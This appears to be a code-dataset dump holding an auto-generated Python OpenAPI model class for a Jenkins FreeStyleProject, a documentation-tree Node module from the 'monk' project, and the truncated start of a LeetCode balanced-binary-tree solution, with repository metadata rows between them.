"""Gets the in_queue of this FreeStyleProject.
:return: The in_queue of this FreeStyleProject.
:rtype: bool
"""
return self._in_queue
@in_queue.setter
def in_queue(self, in_queue):
"""Sets the in_queue of this FreeStyleProject.
:param in_queue: The in_queue of this FreeStyleProject.
:type in_queue: bool
"""
self._in_queue = in_queue
@property
def keep_dependencies(self):
"""Gets the keep_dependencies of this FreeStyleProject.
:return: The keep_dependencies of this FreeStyleProject.
:rtype: bool
"""
return self._keep_dependencies
@keep_dependencies.setter
def keep_dependencies(self, keep_dependencies):
"""Sets the keep_dependencies of this FreeStyleProject.
:param keep_dependencies: The keep_dependencies of this FreeStyleProject.
:type keep_dependencies: bool
"""
self._keep_dependencies = keep_dependencies
@property
def last_build(self):
"""Gets the last_build of this FreeStyleProject.
:return: The last_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_build
@last_build.setter
def last_build(self, last_build):
"""Sets the last_build of this FreeStyleProject.
:param last_build: The last_build of this FreeStyleProject.
:type last_build: FreeStyleBuild
"""
self._last_build = last_build
@property
def last_completed_build(self):
"""Gets the last_completed_build of this FreeStyleProject.
:return: The last_completed_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_completed_build
@last_completed_build.setter
def last_completed_build(self, last_completed_build):
"""Sets the last_completed_build of this FreeStyleProject.
:param last_completed_build: The last_completed_build of this FreeStyleProject.
:type last_completed_build: FreeStyleBuild
"""
self._last_completed_build = last_completed_build
@property
def last_failed_build(self):
"""Gets the last_failed_build of this FreeStyleProject.
:return: The last_failed_build of this FreeStyleProject.
:rtype: str
"""
return self._last_failed_build
@last_failed_build.setter
def last_failed_build(self, last_failed_build):
"""Sets the last_failed_build of this FreeStyleProject.
:param last_failed_build: The last_failed_build of this FreeStyleProject.
:type last_failed_build: str
"""
self._last_failed_build = last_failed_build
@property
def last_stable_build(self):
"""Gets the last_stable_build of this FreeStyleProject.
:return: The last_stable_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_stable_build
@last_stable_build.setter
def last_stable_build(self, last_stable_build):
"""Sets the last_stable_build of this FreeStyleProject.
:param last_stable_build: The last_stable_build of this FreeStyleProject.
:type last_stable_build: FreeStyleBuild
"""
self._last_stable_build = last_stable_build
@property
def last_successful_build(self):
"""Gets the last_successful_build of this FreeStyleProject.
:return: The last_successful_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_successful_build
@last_successful_build.setter
def last_successful_build(self, last_successful_build):
"""Sets the last_successful_build of this FreeStyleProject.
:param last_successful_build: The last_successful_build of this FreeStyleProject.
:type last_successful_build: FreeStyleBuild
"""
self._last_successful_build = last_successful_build
@property
def last_unstable_build(self):
"""Gets the last_unstable_build of this FreeStyleProject.
:return: The last_unstable_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unstable_build
@last_unstable_build.setter
def last_unstable_build(self, last_unstable_build):
"""Sets the last_unstable_build of this FreeStyleProject.
:param last_unstable_build: The last_unstable_build of this FreeStyleProject.
:type last_unstable_build: str
"""
self._last_unstable_build = last_unstable_build
@property
def last_unsuccessful_build(self):
"""Gets the last_unsuccessful_build of this FreeStyleProject.
:return: The last_unsuccessful_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unsuccessful_build
@last_unsuccessful_build.setter
def last_unsuccessful_build(self, last_unsuccessful_build):
"""Sets the last_unsuccessful_build of this FreeStyleProject.
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject.
:type last_unsuccessful_build: str
"""
self._last_unsuccessful_build = last_unsuccessful_build
@property
def next_build_number(self):
"""Gets the next_build_number of this FreeStyleProject.
:return: The next_build_number of this FreeStyleProject.
:rtype: int
"""
return self._next_build_number
@next_build_number.setter
def next_build_number(self, next_build_number):
"""Sets the next_build_number of this FreeStyleProject.
:param next_build_number: The next_build_number of this FreeStyleProject.
:type next_build_number: int
"""
self._next_build_number = next_build_number
@property
def queue_item(self):
"""Gets the queue_item of this FreeStyleProject.
:return: The queue_item of this FreeStyleProject.
:rtype: str
"""
return self._queue_item
@queue_item.setter
def queue_item(self, queue_item):
"""Sets the queue_item of this FreeStyleProject.
:param queue_item: The queue_item of this FreeStyleProject.
:type queue_item: str
"""
self._queue_item = queue_item
@property
def concurrent_build(self):
"""Gets the concurrent_build of this FreeStyleProject.
:return: The concurrent_build of this FreeStyleProject.
:rtype: bool
"""
return self._concurrent_build
@concurrent_build.setter
def concurrent_build(self, concurrent_build):
"""Sets the concurrent_build of this FreeStyleProject.
:param concurrent_build: The concurrent_build of this FreeStyleProject.
:type concurrent_build: bool
"""
self._concurrent_build = concurrent_build
@property
def scm(self):
"""Gets the scm of this FreeStyleProject.
:return: The scm of this FreeStyleProject.
:rtype: NullSCM
"""
return self._scm
@scm.setter
def scm(self, scm):
"""Sets the scm of this FreeStyleProject.
:param scm: The scm of this FreeStyleProject.
:type scm: NullSCM
"""
self._scm = scm
| 30.911883 | 557 | 0.661037 | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.free_style_build import FreeStyleBuild
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport
from openapi_server.models.null_scm import NullSCM
from openapi_server import util
from openapi_server.models.free_style_build import FreeStyleBuild # noqa: E501
from openapi_server.models.free_style_projectactions import FreeStyleProjectactions # noqa: E501
from openapi_server.models.free_style_projecthealth_report import FreeStyleProjecthealthReport # noqa: E501
from openapi_server.models.null_scm import NullSCM # noqa: E501
class FreeStyleProject(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, _class=None, name=None, url=None, color=None, actions=None, description=None, display_name=None, display_name_or_null=None, full_display_name=None, full_name=None, buildable=None, builds=None, first_build=None, health_report=None, in_queue=None, keep_dependencies=None, last_build=None, last_completed_build=None, last_failed_build=None, last_stable_build=None, last_successful_build=None, last_unstable_build=None, last_unsuccessful_build=None, next_build_number=None, queue_item=None, concurrent_build=None, scm=None): # noqa: E501
"""FreeStyleProject - a model defined in OpenAPI
:param _class: The _class of this FreeStyleProject. # noqa: E501
:type _class: str
:param name: The name of this FreeStyleProject. # noqa: E501
:type name: str
:param url: The url of this FreeStyleProject. # noqa: E501
:type url: str
:param color: The color of this FreeStyleProject. # noqa: E501
:type color: str
:param actions: The actions of this FreeStyleProject. # noqa: E501
:type actions: List[FreeStyleProjectactions]
:param description: The description of this FreeStyleProject. # noqa: E501
:type description: str
:param display_name: The display_name of this FreeStyleProject. # noqa: E501
:type display_name: str
:param display_name_or_null: The display_name_or_null of this FreeStyleProject. # noqa: E501
:type display_name_or_null: str
:param full_display_name: The full_display_name of this FreeStyleProject. # noqa: E501
:type full_display_name: str
:param full_name: The full_name of this FreeStyleProject. # noqa: E501
:type full_name: str
:param buildable: The buildable of this FreeStyleProject. # noqa: E501
:type buildable: bool
:param builds: The builds of this FreeStyleProject. # noqa: E501
:type builds: List[FreeStyleBuild]
:param first_build: The first_build of this FreeStyleProject. # noqa: E501
:type first_build: FreeStyleBuild
:param health_report: The health_report of this FreeStyleProject. # noqa: E501
:type health_report: List[FreeStyleProjecthealthReport]
:param in_queue: The in_queue of this FreeStyleProject. # noqa: E501
:type in_queue: bool
:param keep_dependencies: The keep_dependencies of this FreeStyleProject. # noqa: E501
:type keep_dependencies: bool
:param last_build: The last_build of this FreeStyleProject. # noqa: E501
:type last_build: FreeStyleBuild
:param last_completed_build: The last_completed_build of this FreeStyleProject. # noqa: E501
:type last_completed_build: FreeStyleBuild
:param last_failed_build: The last_failed_build of this FreeStyleProject. # noqa: E501
:type last_failed_build: str
:param last_stable_build: The last_stable_build of this FreeStyleProject. # noqa: E501
:type last_stable_build: FreeStyleBuild
:param last_successful_build: The last_successful_build of this FreeStyleProject. # noqa: E501
:type last_successful_build: FreeStyleBuild
:param last_unstable_build: The last_unstable_build of this FreeStyleProject. # noqa: E501
:type last_unstable_build: str
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject. # noqa: E501
:type last_unsuccessful_build: str
:param next_build_number: The next_build_number of this FreeStyleProject. # noqa: E501
:type next_build_number: int
:param queue_item: The queue_item of this FreeStyleProject. # noqa: E501
:type queue_item: str
:param concurrent_build: The concurrent_build of this FreeStyleProject. # noqa: E501
:type concurrent_build: bool
:param scm: The scm of this FreeStyleProject. # noqa: E501
:type scm: NullSCM
"""
self.openapi_types = {
'_class': str,
'name': str,
'url': str,
'color': str,
'actions': List[FreeStyleProjectactions],
'description': str,
'display_name': str,
'display_name_or_null': str,
'full_display_name': str,
'full_name': str,
'buildable': bool,
'builds': List[FreeStyleBuild],
'first_build': FreeStyleBuild,
'health_report': List[FreeStyleProjecthealthReport],
'in_queue': bool,
'keep_dependencies': bool,
'last_build': FreeStyleBuild,
'last_completed_build': FreeStyleBuild,
'last_failed_build': str,
'last_stable_build': FreeStyleBuild,
'last_successful_build': FreeStyleBuild,
'last_unstable_build': str,
'last_unsuccessful_build': str,
'next_build_number': int,
'queue_item': str,
'concurrent_build': bool,
'scm': NullSCM
}
self.attribute_map = {
'_class': '_class',
'name': 'name',
'url': 'url',
'color': 'color',
'actions': 'actions',
'description': 'description',
'display_name': 'displayName',
'display_name_or_null': 'displayNameOrNull',
'full_display_name': 'fullDisplayName',
'full_name': 'fullName',
'buildable': 'buildable',
'builds': 'builds',
'first_build': 'firstBuild',
'health_report': 'healthReport',
'in_queue': 'inQueue',
'keep_dependencies': 'keepDependencies',
'last_build': 'lastBuild',
'last_completed_build': 'lastCompletedBuild',
'last_failed_build': 'lastFailedBuild',
'last_stable_build': 'lastStableBuild',
'last_successful_build': 'lastSuccessfulBuild',
'last_unstable_build': 'lastUnstableBuild',
'last_unsuccessful_build': 'lastUnsuccessfulBuild',
'next_build_number': 'nextBuildNumber',
'queue_item': 'queueItem',
'concurrent_build': 'concurrentBuild',
'scm': 'scm'
}
self.__class = _class
self._name = name
self._url = url
self._color = color
self._actions = actions
self._description = description
self._display_name = display_name
self._display_name_or_null = display_name_or_null
self._full_display_name = full_display_name
self._full_name = full_name
self._buildable = buildable
self._builds = builds
self._first_build = first_build
self._health_report = health_report
self._in_queue = in_queue
self._keep_dependencies = keep_dependencies
self._last_build = last_build
self._last_completed_build = last_completed_build
self._last_failed_build = last_failed_build
self._last_stable_build = last_stable_build
self._last_successful_build = last_successful_build
self._last_unstable_build = last_unstable_build
self._last_unsuccessful_build = last_unsuccessful_build
self._next_build_number = next_build_number
self._queue_item = queue_item
self._concurrent_build = concurrent_build
self._scm = scm
@classmethod
def from_dict(cls, dikt) -> 'FreeStyleProject':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The FreeStyleProject of this FreeStyleProject. # noqa: E501
:rtype: FreeStyleProject
"""
return util.deserialize_model(dikt, cls)
@property
def _class(self):
"""Gets the _class of this FreeStyleProject.
:return: The _class of this FreeStyleProject.
:rtype: str
"""
return self.__class
@_class.setter
def _class(self, _class):
"""Sets the _class of this FreeStyleProject.
:param _class: The _class of this FreeStyleProject.
:type _class: str
"""
self.__class = _class
@property
def name(self):
"""Gets the name of this FreeStyleProject.
:return: The name of this FreeStyleProject.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this FreeStyleProject.
:param name: The name of this FreeStyleProject.
:type name: str
"""
self._name = name
@property
def url(self):
"""Gets the url of this FreeStyleProject.
:return: The url of this FreeStyleProject.
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this FreeStyleProject.
:param url: The url of this FreeStyleProject.
:type url: str
"""
self._url = url
@property
def color(self):
"""Gets the color of this FreeStyleProject.
:return: The color of this FreeStyleProject.
:rtype: str
"""
return self._color
@color.setter
def color(self, color):
"""Sets the color of this FreeStyleProject.
:param color: The color of this FreeStyleProject.
:type color: str
"""
self._color = color
@property
def actions(self):
"""Gets the actions of this FreeStyleProject.
:return: The actions of this FreeStyleProject.
:rtype: List[FreeStyleProjectactions]
"""
return self._actions
@actions.setter
def actions(self, actions):
"""Sets the actions of this FreeStyleProject.
:param actions: The actions of this FreeStyleProject.
:type actions: List[FreeStyleProjectactions]
"""
self._actions = actions
@property
def description(self):
"""Gets the description of this FreeStyleProject.
:return: The description of this FreeStyleProject.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this FreeStyleProject.
:param description: The description of this FreeStyleProject.
:type description: str
"""
self._description = description
@property
def display_name(self):
"""Gets the display_name of this FreeStyleProject.
:return: The display_name of this FreeStyleProject.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""Sets the display_name of this FreeStyleProject.
:param display_name: The display_name of this FreeStyleProject.
:type display_name: str
"""
self._display_name = display_name
@property
def display_name_or_null(self):
"""Gets the display_name_or_null of this FreeStyleProject.
:return: The display_name_or_null of this FreeStyleProject.
:rtype: str
"""
return self._display_name_or_null
@display_name_or_null.setter
def display_name_or_null(self, display_name_or_null):
"""Sets the display_name_or_null of this FreeStyleProject.
:param display_name_or_null: The display_name_or_null of this FreeStyleProject.
:type display_name_or_null: str
"""
self._display_name_or_null = display_name_or_null
@property
def full_display_name(self):
"""Gets the full_display_name of this FreeStyleProject.
:return: The full_display_name of this FreeStyleProject.
:rtype: str
"""
return self._full_display_name
@full_display_name.setter
def full_display_name(self, full_display_name):
"""Sets the full_display_name of this FreeStyleProject.
:param full_display_name: The full_display_name of this FreeStyleProject.
:type full_display_name: str
"""
self._full_display_name = full_display_name
@property
def full_name(self):
"""Gets the full_name of this FreeStyleProject.
:return: The full_name of this FreeStyleProject.
:rtype: str
"""
return self._full_name
@full_name.setter
def full_name(self, full_name):
"""Sets the full_name of this FreeStyleProject.
:param full_name: The full_name of this FreeStyleProject.
:type full_name: str
"""
self._full_name = full_name
@property
def buildable(self):
"""Gets the buildable of this FreeStyleProject.
:return: The buildable of this FreeStyleProject.
:rtype: bool
"""
return self._buildable
@buildable.setter
def buildable(self, buildable):
"""Sets the buildable of this FreeStyleProject.
:param buildable: The buildable of this FreeStyleProject.
:type buildable: bool
"""
self._buildable = buildable
@property
def builds(self):
"""Gets the builds of this FreeStyleProject.
:return: The builds of this FreeStyleProject.
:rtype: List[FreeStyleBuild]
"""
return self._builds
@builds.setter
def builds(self, builds):
"""Sets the builds of this FreeStyleProject.
:param builds: The builds of this FreeStyleProject.
:type builds: List[FreeStyleBuild]
"""
self._builds = builds
@property
def first_build(self):
"""Gets the first_build of this FreeStyleProject.
:return: The first_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._first_build
@first_build.setter
def first_build(self, first_build):
"""Sets the first_build of this FreeStyleProject.
:param first_build: The first_build of this FreeStyleProject.
:type first_build: FreeStyleBuild
"""
self._first_build = first_build
@property
def health_report(self):
"""Gets the health_report of this FreeStyleProject.
:return: The health_report of this FreeStyleProject.
:rtype: List[FreeStyleProjecthealthReport]
"""
return self._health_report
@health_report.setter
def health_report(self, health_report):
"""Sets the health_report of this FreeStyleProject.
:param health_report: The health_report of this FreeStyleProject.
:type health_report: List[FreeStyleProjecthealthReport]
"""
self._health_report = health_report
@property
def in_queue(self):
"""Gets the in_queue of this FreeStyleProject.
:return: The in_queue of this FreeStyleProject.
:rtype: bool
"""
return self._in_queue
@in_queue.setter
def in_queue(self, in_queue):
"""Sets the in_queue of this FreeStyleProject.
:param in_queue: The in_queue of this FreeStyleProject.
:type in_queue: bool
"""
self._in_queue = in_queue
@property
def keep_dependencies(self):
"""Gets the keep_dependencies of this FreeStyleProject.
:return: The keep_dependencies of this FreeStyleProject.
:rtype: bool
"""
return self._keep_dependencies
@keep_dependencies.setter
def keep_dependencies(self, keep_dependencies):
"""Sets the keep_dependencies of this FreeStyleProject.
:param keep_dependencies: The keep_dependencies of this FreeStyleProject.
:type keep_dependencies: bool
"""
self._keep_dependencies = keep_dependencies
@property
def last_build(self):
"""Gets the last_build of this FreeStyleProject.
:return: The last_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_build
@last_build.setter
def last_build(self, last_build):
"""Sets the last_build of this FreeStyleProject.
:param last_build: The last_build of this FreeStyleProject.
:type last_build: FreeStyleBuild
"""
self._last_build = last_build
@property
def last_completed_build(self):
"""Gets the last_completed_build of this FreeStyleProject.
:return: The last_completed_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_completed_build
@last_completed_build.setter
def last_completed_build(self, last_completed_build):
"""Sets the last_completed_build of this FreeStyleProject.
:param last_completed_build: The last_completed_build of this FreeStyleProject.
:type last_completed_build: FreeStyleBuild
"""
self._last_completed_build = last_completed_build
@property
def last_failed_build(self):
"""Gets the last_failed_build of this FreeStyleProject.
:return: The last_failed_build of this FreeStyleProject.
:rtype: str
"""
return self._last_failed_build
@last_failed_build.setter
def last_failed_build(self, last_failed_build):
"""Sets the last_failed_build of this FreeStyleProject.
:param last_failed_build: The last_failed_build of this FreeStyleProject.
:type last_failed_build: str
"""
self._last_failed_build = last_failed_build
@property
def last_stable_build(self):
"""Gets the last_stable_build of this FreeStyleProject.
:return: The last_stable_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_stable_build
@last_stable_build.setter
def last_stable_build(self, last_stable_build):
"""Sets the last_stable_build of this FreeStyleProject.
:param last_stable_build: The last_stable_build of this FreeStyleProject.
:type last_stable_build: FreeStyleBuild
"""
self._last_stable_build = last_stable_build
@property
def last_successful_build(self):
"""Gets the last_successful_build of this FreeStyleProject.
:return: The last_successful_build of this FreeStyleProject.
:rtype: FreeStyleBuild
"""
return self._last_successful_build
@last_successful_build.setter
def last_successful_build(self, last_successful_build):
"""Sets the last_successful_build of this FreeStyleProject.
:param last_successful_build: The last_successful_build of this FreeStyleProject.
:type last_successful_build: FreeStyleBuild
"""
self._last_successful_build = last_successful_build
@property
def last_unstable_build(self):
"""Gets the last_unstable_build of this FreeStyleProject.
:return: The last_unstable_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unstable_build
@last_unstable_build.setter
def last_unstable_build(self, last_unstable_build):
"""Sets the last_unstable_build of this FreeStyleProject.
:param last_unstable_build: The last_unstable_build of this FreeStyleProject.
:type last_unstable_build: str
"""
self._last_unstable_build = last_unstable_build
@property
def last_unsuccessful_build(self):
"""Gets the last_unsuccessful_build of this FreeStyleProject.
:return: The last_unsuccessful_build of this FreeStyleProject.
:rtype: str
"""
return self._last_unsuccessful_build
@last_unsuccessful_build.setter
def last_unsuccessful_build(self, last_unsuccessful_build):
"""Sets the last_unsuccessful_build of this FreeStyleProject.
:param last_unsuccessful_build: The last_unsuccessful_build of this FreeStyleProject.
:type last_unsuccessful_build: str
"""
self._last_unsuccessful_build = last_unsuccessful_build
@property
def next_build_number(self):
"""Gets the next_build_number of this FreeStyleProject.
:return: The next_build_number of this FreeStyleProject.
:rtype: int
"""
return self._next_build_number
@next_build_number.setter
def next_build_number(self, next_build_number):
"""Sets the next_build_number of this FreeStyleProject.
:param next_build_number: The next_build_number of this FreeStyleProject.
:type next_build_number: int
"""
self._next_build_number = next_build_number
@property
def queue_item(self):
"""Gets the queue_item of this FreeStyleProject.
:return: The queue_item of this FreeStyleProject.
:rtype: str
"""
return self._queue_item
@queue_item.setter
def queue_item(self, queue_item):
"""Sets the queue_item of this FreeStyleProject.
:param queue_item: The queue_item of this FreeStyleProject.
:type queue_item: str
"""
self._queue_item = queue_item
@property
def concurrent_build(self):
"""Gets the concurrent_build of this FreeStyleProject.
:return: The concurrent_build of this FreeStyleProject.
:rtype: bool
"""
return self._concurrent_build
@concurrent_build.setter
def concurrent_build(self, concurrent_build):
"""Sets the concurrent_build of this FreeStyleProject.
:param concurrent_build: The concurrent_build of this FreeStyleProject.
:type concurrent_build: bool
"""
self._concurrent_build = concurrent_build
@property
def scm(self):
"""Gets the scm of this FreeStyleProject.
:return: The scm of this FreeStyleProject.
:rtype: NullSCM
"""
return self._scm
@scm.setter
def scm(self, scm):
"""Sets the scm of this FreeStyleProject.
:param scm: The scm of this FreeStyleProject.
:type scm: NullSCM
"""
self._scm = scm
| 0 | 0 | 0 |
f657d71bced67aaaaac27a13df0ae0fb35ce68ed | 10,329 | py | Python | monkNode.py | atria-tools/monk | 4961457f4db5dfa98fc6001a289c24e460e5b025 | [
"Apache-2.0"
] | null | null | null | monkNode.py | atria-tools/monk | 4961457f4db5dfa98fc6001a289c24e460e5b025 | [
"Apache-2.0"
] | 1 | 2015-03-22T12:37:18.000Z | 2015-03-22T12:37:18.000Z | monkNode.py | HeeroYui/monk | 4961457f4db5dfa98fc6001a289c24e460e5b025 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import monkDebug as debug
import monkModule as module
access_list = ['private', 'protected', 'public']
genericUID = 0
##
## @ brief only for namespace :
##
##
##
## @brief Get the list of all specify type
## @param[in] type Type requested ['namespace', 'class', 'struct', 'methode', 'enum', 'define', 'union', 'variable', 'constructor', 'destructor'] (can be a list)
## @param[in] sorted Request to sort the return list.
## @return The requested list or []
##
| 26.759067 | 162 | 0.645367 | #!/usr/bin/python
import monkDebug as debug
import monkModule as module
access_list = ['private', 'protected', 'public']
def debug_space(level):
ret = ""
for iii in range(0,level):
ret += " "
return ret
genericUID = 0
class Node():
def __init__(self, type, name="", file="", line_number=0, documentation=[]):
global genericUID
genericUID+=1
self.uid = genericUID
self.documenatation_code = []
self.node_type = type
self.name = name
self.doc = None
self.file_name = file
self.line_number = line_number
self.sub_list = None
self.access = None
# namespace elements : (set when all element are parsed ...
self.namespace = []
self.module_link = None # this is a link on the main application node or library node (usefull to get the website ...)
self.hidden_request = False # @not-in-doc
self.previous_request = False # @previous
self.template = []
self.add_doc(documentation)
def to_str(self):
return ""
def str(self):
return self.to_str()
def get_node_type(self):
return self.node_type
def get_name(self):
ret = ""
if self.template != []:
ret += "template<"
first = True
for elem in self.template:
if first == True:
first = False
else:
ret += ", "
if len(elem) >= 2:
ret += elem[1]
else:
ret += elem[0]
ret += "> "
ret += self.name
return ret
def get_UID(self):
return self.uid
def add_doc(self, doc):
for element in doc:
self.documenatation_code.append(element)
if element.find("@not-in-doc") != -1 :
self.hidden_request = True
if element.find("@previous") != -1 :
self.previous_request = True
def get_request_hidden(self):
return self.hidden_request
def get_request_in_previous(self):
return self.previous_request
def get_displayable_name(self):
ret = ""
for namespace in self.namespace:
ret += namespace + "::"
ret += self.name
return ret
def get_uid(self):
return self.uid
def get_doc(self):
#debug.info(str(self.doc))
if len(self.documenatation_code) > 0:
ret = ""
isFirst = True
for req in self.documenatation_code:
if isFirst == False:
ret += '\n'
isFirst = False
ret += req
return ret
if self.node_type not in ['methode']:
return ""
#try to get previous element :
if len(self.namespace) == 0:
return ""
parent = ""
isFirst = True
for namesapace in self.namespace:
if isFirst == False:
parent += "::"
isFirst = False
parent += namesapace
element = module.get_element_with_name(parent)
if element == None:
return ""
if element.get_node_type() != 'class':
return ""
parents = element.get_parents()
if len(parents) == 0:
return ""
for myParent in reversed(parents):
element = module.get_element_with_name(myParent[0]['class'])
if element == None:
continue
heveMethode, pointerMethode = element.have_methode(self.name)
if heveMethode == False:
continue
if len(pointerMethode.documenatation_code) != 0:
return pointerMethode.get_doc()
return ""
def get_lib_name(self):
if self.module_link == None:
return None
return self.module_link.get_base_doc_node().get_name()
def debug_display(self, level=0, access = None):
if access == 'private':
debug.info(debug_space(level) + "- " + self.node_type + " => " + self.name)
elif access == 'protected':
debug.info(debug_space(level) + "# " + self.node_type + " => " + self.name)
elif access == 'public':
debug.info(debug_space(level) + "+ " + self.node_type + " => " + self.name)
else:
debug.info(debug_space(level) + self.node_type + " => " + self.name)
if self.sub_list!= None:
for element in self.sub_list:
if 'access' in element.keys():
element['node'].debug_display(level+1, element['access'])
else:
element['node'].debug_display(level+1)
def set_access(self, access):
if access not in access_list:
debug.warning("This is not a valid access : '" + access + "' : availlable : " + str(access_list))
return
if self.access == None:
debug.error("This Node does not support acces configuration...")
return
self.access = access
def get_access(self):
return self.access
def append(self, newSubElement):
# just add it in a sub List :
if self.sub_list == None:
debug.error("can not add a '" + newSubElement.node_type + "' at this '" + self.node_type + "'")
return
if newSubElement.get_node_type() != 'namespace':
if self.access == None:
self.sub_list.append({'node' : newSubElement})
else:
self.sub_list.append({'access' : self.access, 'node' : newSubElement})
return
# check if the element already exist
for element in self.sub_list:
if element['node'].get_node_type() == 'namespace':
if element['node'].get_name() == newSubElement.get_name():
debug.verbose("fusionate with previous declaration")
element['node'].fusion(newSubElement)
return
# normal case adding :
if self.access == None:
self.sub_list.append({'node' : newSubElement})
else:
self.sub_list.append({'access' : self.access, 'node' : newSubElement})
##
## @ brief only for namespace :
##
##
def fusion(self, addedElement):
for element in addedElement.sub_list:
self.append(element['node'])
##
## @brief Get the list of all specify type
## @param[in] type Type requested ['namespace', 'class', 'struct', 'methode', 'enum', 'define', 'union', 'variable', 'constructor', 'destructor'] (can be a list)
## @param[in] sorted Request to sort the return list.
## @return The requested list or []
##
def get_all_sub_type(self, type='all', sorted = False):
if type == 'all':
return self.sub_list
if isinstance(type, list) == False:
type = [type]
if self.sub_list == None:
return []
ret = []
for element in self.sub_list:
if element['node'].get_node_type() in type:
ret.append(element)
if sorted == True:
# TODO : Sorted the list ...
pass
return ret
def get_doc_website_page(self):
if self.module_link == None:
return ""
ret = self.module_link.get_website()
if ret[-1] != '/':
ret += '/'
ret += self.get_node_type()
ret += "_"
for name in self.namespace:
ret += name + "__"
if self.name == "":
ret += "NO_NAME_" + str(self.uid)
else:
ret += self.name
ret += '.html'
return ret
def get_doc_website_page_local(self):
ret = self.get_node_type()
ret += "_"
for name in self.namespace:
ret += name + "__"
if self.name == "":
ret += "NO_NAME_" + str(self.uid)
else:
ret += self.name
if self.template != []:
ret += "__template_"
first = True
for elem in self.template:
if first == True:
first = False
else:
ret += "_"
if len(elem) >= 2:
ret += elem[1]
else:
ret += elem[0]
ret += "__"
ret += '.html'
return ret
def set_module_link(self, module):
self.module_link = module
# set for all sub elements ...
if self.sub_list == None:
return
if self.node_type in ['class', 'namespace', 'struct']:
for element in self.sub_list:
element['node'].set_module_link(module)
elif self.node_type in ['library', 'application']:
for element in self.sub_list:
element['node'].set_module_link(module)
def set_namespace(self, hierarchy = []):
#debug.info('set namespace : ' + self.name + ' : ' + str(hierarchy))
# store namespaces:
for tmpName in hierarchy:
self.namespace.append(tmpName)
# set for all sub elements ...
if self.sub_list == None:
return
if self.node_type in ['class', 'namespace', 'struct']:
for element in self.sub_list:
hierarchy.append(self.name)
element['node'].set_namespace(hierarchy)
#debug.info(" ==> " + str(element['node'].get_namespace()))
hierarchy.pop()
elif self.node_type in ['library', 'application']:
for element in self.sub_list:
element['node'].set_namespace()
#debug.info(" ==> " + str(element['node'].get_namespace()))
def get_namespace(self):
return self.namespace
def complete_display(self):
debug.info(str(self.namespace) + ' : ' + self.name)
if self.sub_list == None:
return
for element in self.sub_list:
element['node'].complete_display()
def find(self, list):
debug.verbose("find : " + str(list) + " in " + self.node_type + "(" + self.name + ")")
if len(list) == 0:
return None
if self.node_type in ['library', 'application']:
if self.sub_list == None:
return None
for element in self.sub_list:
ret = element['node'].find(list)
if ret != None:
return ret
return None
if list[0] != self.name:
return None
tmpList = list[1:]
if len(tmpList) == 0:
return self
elif self.node_type not in ['class', 'namespace', 'struct']:
# have other sub element and other elemetn than upper can have sub element ...
return None
if self.sub_list == None:
return None
for element in self.sub_list:
ret = element['node'].find(tmpList)
if ret != None:
return ret
return None
def get_whith_specific_parrent(self, parrentName):
ret = []
# set for all sub elements ...
if self.sub_list != None:
for element in self.sub_list:
tmpRet = element['node'].get_whith_specific_parrent(parrentName)
if len(tmpRet) != 0:
for tmp in tmpRet:
ret.append(tmp)
return ret
def have_methode(self, methodeName):
if self.sub_list != None:
for element in self.sub_list:
if element['node'].get_node_type() != 'methode':
continue
if element['access'] == "private":
continue
if element['node'].get_virtual() == False:
continue
if element['node'].get_name() == methodeName:
return [True, element['node']]
return [False, None]
class MainNode(Node):
def __init__(self, type="library", name=""):
Node.__init__(self, type, name)
self.sub_list = []
def get_doc_website_page_relative(base, dest):
realBase = ""
tmpBase = ""
lastFolder = ""
for element in base:
tmpBase += element
if element == '/':
realBase += tmpBase
lastFolder = tmpBase
tmpBase = ""
if dest[:len(realBase)] == realBase:
return dest[len(realBase):]
#debug.info(dest[:len(realBase)-len(lastFolder)] + "==" + realBase[:-len(lastFolder)])
if dest[:len(realBase)-len(lastFolder)] == realBase[:-len(lastFolder)]:
return '../' + dest[len(realBase)-len(lastFolder):]
return dest
| 9,022 | -8 | 809 |
61c6228d07263ba5b340f2078725ac7dc107668c | 1,802 | py | Python | src/110.BalancedBinaryTree/110.py | Taowyoo/LeetCodeLog | cb05798538dd10675bf81011a419d0e33d85e4e0 | [
"MIT"
] | null | null | null | src/110.BalancedBinaryTree/110.py | Taowyoo/LeetCodeLog | cb05798538dd10675bf81011a419d0e33d85e4e0 | [
"MIT"
] | null | null | null | src/110.BalancedBinaryTree/110.py | Taowyoo/LeetCodeLog | cb05798538dd10675bf81011a419d0e33d85e4e0 | [
"MIT"
] | null | null | null | '''
File: 110.py
File Created: 2021-01-12 13:48:32 -08:00
Author: Taowyoo (caoyxsh@outlook.com)
Brief: https://leetcode.com/problems/balanced-binary-tree/
-----
Last Modified: 2021-01-12 13:48:41 -08:00
Modified By: Taowyoo (caoyxsh@outlook.com>)
-----
Copyright 2020 - 2021
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
"""Recursive Solution
"""
class Solution(object):
"""Itrative Solution
Args:
object ([type]): [description]
